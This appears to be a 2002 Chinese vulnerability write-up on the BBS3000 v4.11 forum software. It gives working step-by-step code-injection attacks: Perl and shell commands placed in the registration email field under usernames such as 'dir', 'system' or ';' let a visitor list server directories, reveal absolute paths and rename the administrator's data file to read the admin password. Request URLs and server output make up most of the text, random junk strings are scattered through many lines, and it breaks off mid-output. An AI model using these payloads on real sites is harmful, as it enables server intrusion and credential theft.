窥探YUZI的BBS3000社区安全性--1

YES东

窥探YUZI的BBS3000社区安全性--1
文章类型：漏洞分析 文章加入时间：2002年1月24日22:24
--------------------------------------------------------------------------------
4 P1 [! Q+ i% I
, H# a' a6 b' [+ e# _窥探YUZI的BBS3000社区安全性
—————————————————————————————————
badboy-club@21cn.com
/ L! }4 h: b0 j+ w) p6 c部分漏洞提供者：
  {0 `* {/ y3 I2 @8 Ladver
( T  w! n# X8 @: X/ c; m5 Xx.z
这并不是什么权威教材，只适合菜鸟了解某些免费提供的论坛程序存在的不
安全面，切莫用此方法在国内做尝试，如果你偏要如此，那么由此引起的一
% f, U% W. b4 l切法律后果由你自己负责。
本文只允许在网络任意转载，但须保留文章的完整性，如把本文作为经济目
, P% G- i! B% `4 C的使用，或者未经本人许可进行印刷、光盘杂志、等出版性质的行为，本人
) e$ G5 n& K7 {* }. m$ N) k( x0 `. P将保留侵权控告的权利。
—————————————————————————————————
第一篇
2 C9 I0 w. s6 h- I$ ^9 ^+ E0 i& D6 u****基本漏洞测试*****
0 F9 L* E: A' `& |    YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛，
( S- f2 I; [9 b  d6 p# @' y6 @但不少用户很少去探测这论坛的安全性，使用者很大程度上信任作者，而实际上
. X) z7 X+ y. |* K这些免费的版本和汉化修改论坛，往往存在一些致命的漏洞，本文的目的在于揭
示该论坛不为人知的漏洞，让大家更好的使用这类论坛，并且保证自身资料的隐
9 `/ }- r4 }( J6 ~; z, u- X蔽和服务器的安全。
测试版本:bbs3000 v4.11
系统平台：win2k adv server=sp3 + iis 5.0  +ActivePerl 5.6.1.626
, {, V6 ]8 x1 X# _2 o7 A应用程序映射:perl.exe %s %s 动作：GET,HEAD,POST
        或者:perlIS.dll 动作：GET,HEAD,POST
测试情况：
一、用户名为dir的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
% V4 M3 E8 P' O9 I3 _" @, I9 q3 M' U在站点建立一目录（或者虚拟目录）bbs3000,按论坛作者提供的说明书，默认安
装BBS3000 v4.11版本，我们注册一用户名为dir,密码为system,信箱为
#badboy@badclub.org（#任意信箱都可以），然后我们在IE地址栏处输入：
* }# x# Q9 I! f# W7 u! h* P* shttp://192.168.0.1/bbs3000/yhzl/dir.cgi
9 o9 l4 Y2 q% I/ P. `F:\new\bbs3000\bbs3000 的目录
2002-01-16  19:26       <DIR>          .
7 T- d2 ~7 @. N/ V2002-01-16  19:26       <DIR>          ..
) A6 S" U6 r, _2002-01-16  22:42               43,247 bbs.cgi
2002-01-16  22:47               50,934 cjyh.cgi
- e4 k8 N: u5 P* C) x# @. O$ [7 j( n2002-01-16  22:43               38,551 bbs1.cgi
2002-01-16  22:48                6,401 cookie.cgi
" O! a( p3 k8 h! b$ ?- E  L2002-01-16  22:42                2,138 affiche.cgi
2002-01-16  22:43               22,434 bbs2.cgi
( g$ f7 C/ k3 Z1 O3 _2 _（以下略）
$ }3 w( T7 |9 K5 s& @              34 个文件        417,611 字节
              15 个目录  1,830,944,768 可用字节

& \% K0 T5 _# y& z6 c2、采用应用程序映射:perlIS.dll应用程序映射
得到的显示页面为：
) W! U7 L4 ]/ _7 K# f'F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
) E" e% o2 D4 M! @- L/ k9 y4 K测试解释：在应用程序映射中，一个扩展名只能由一个程序去映射，在采用
  z& y) F& r1 W" ]9 \+ S/ J7 ?perl.exe时，BBS3000存在查看网站目录和文件的漏洞，在采用perlIS.dll时，
则有暴露网站在服务器上的绝对地址的漏洞。
二、用户名为system的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
) P# H9 |# ?9 I  D/ \8 e0 ]# d注册一用户名为system，密码为空格键（或者密码为system），信箱为
/ v! |7 H: o1 j) }: x- ['dir c:'#@badclub.org，然后我们在IE地址栏内输入：
! O, @1 o' M+ k7 \/ m+ Thttp://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为：
C:\ 的目录
+ ^; w. M: w( C. H4 i2001-11-27  20:56                1,002 FRUNLOG.TXT
" @( a9 [- b1 e+ l5 @2 i5 h9 J2001-11-27  20:49       <DIR>          WINNT
（以下略）
              10 个文件         29,583 字节
" ]" o  y2 [( ^' S4 D               9 个目录    946,327,552 可用字节
当密码为其他时，则显示：
CGI Error
The specified CGI application misbehaved by not returning a complete
7 @4 l' i+ N% D+ R set of HTTP headers. The headers it did return are:
syntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near
"1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi
aborted due to compilation errors.
# S( ?9 K* R  l# ~6 V我们还可以这样测试用户名为system的情况，密码仍然为空格键
（或者密码为system）但把信箱修改为＠ARGV##badboy@badclub.org，然后我
们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
返回的页面显示
0 o( @3 `6 Y0 k- h3 q( KD:\ 的目录
2001-01-18  23:23       <DIR>          tools
* @% A4 Q$ Z8 k; l" [. {2001-11-27  21:18       <DIR>          98tools
) {; {# _  V) d- T  H( e2001-04-08  13:08       <DIR>          W2Kreskit
0 W9 T# X; l# K8 ?! ?' E2001-11-06  19:52       <DIR>          NOCDKEY-PROT
2001-12-01  21:32       <DIR>          WINNT
9 |. q! f( t; w! a7 S! N2001-12-01  21:39       <DIR>          Documents and Settings
! ?0 z9 m8 M, N/ F2 w6 {3 N/ |; z& s2001-12-01  21:41       <DIR>          Program Files
2001-12-01  21:53       <DIR>          Inetpub
" n, |' q) x1 K" a2002-01-16  19:17       <DIR>          pl
（以下省略部分内容）   
; V# J1 n' r2 }" d* G           12 个文件     15,068,818 字节
' w+ z6 R- L: o9 n: X$ x" S) @# w  I              15 个目录  2,371,317,760 可用字节
'0' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
2、采用应用程序映射:perlIS.dll应用程序映射
用户名为system，密码为空格键（或者密码为system），信箱为'dir c:'#@badclub.org，
$ A% e( D  F; C: P6 h/ m然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为：
+ W0 l6 F# o' v! k' H0 q& C'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
把信箱修改为＠ARGV##badboy@badclub.org，然后我们在IE地址栏内输入：
4 T* M, h. {, o" D" Z- {http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
# U: Z+ R" _6 B# M, b! \返回的页面显示
: c3 e) Y& L) c5 J'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
0 A5 c( T* \9 }& c- A三、用户名为;字符的情况
2 O4 s! p  p  f1 d; }8 p6 T( n/ w1 W1、采用应用程序映射:perlIS.dll应用程序映射
8 v5 Z4 Z+ n, E- K7 `9 Y0 g3 p1 T6 A注册一用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ，
3 {+ {, M9 B# [（这里假设badboy为该论坛的社区区长，也就是该论坛最大权限的用户），然后我们
6 |5 z2 }/ T4 k2 J2 b9 U/ T, G* |在IE地址栏内输入：
4 V) Z: e- f1 j3 _$ r8 C# @; hhttp://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
'F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output
嗯，怎么还是和上面的perl.dll例子一样啊？？后面的就是关键了，你再输入这样
的看看
http://192.168.0.1/bbs3000/yhzl/badboy.txt
  A2 F4 ^9 K- q5 ~, a. w( z返回的页面显示为
badpass badboy http://192.168.0.1 2002-01-16
显示的内容前面就是密码、用户
' [% q' G/ X; q5 n天啊，事情怎么那么容易呀！！~_*
经测试，用户名为system密码为一个空格键（或者为system)，信箱为
rename "badboy.cgi","badboy.txt";#@badclub.org 的时候，步骤和上面一样，同样
/ g% L6 ~# ^: P# I) }8 a! @可以获得相同的结果。
2、采用应用程序映射:perl.exe %s %s应用程序映射
用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org
在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
0 Y' P7 R& G8 }: B4 HCGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
0 P- I/ h' N- h7 }  Uheaders. The headers it did return are:
  {3 t$ A# S9 X& Z- L1 ~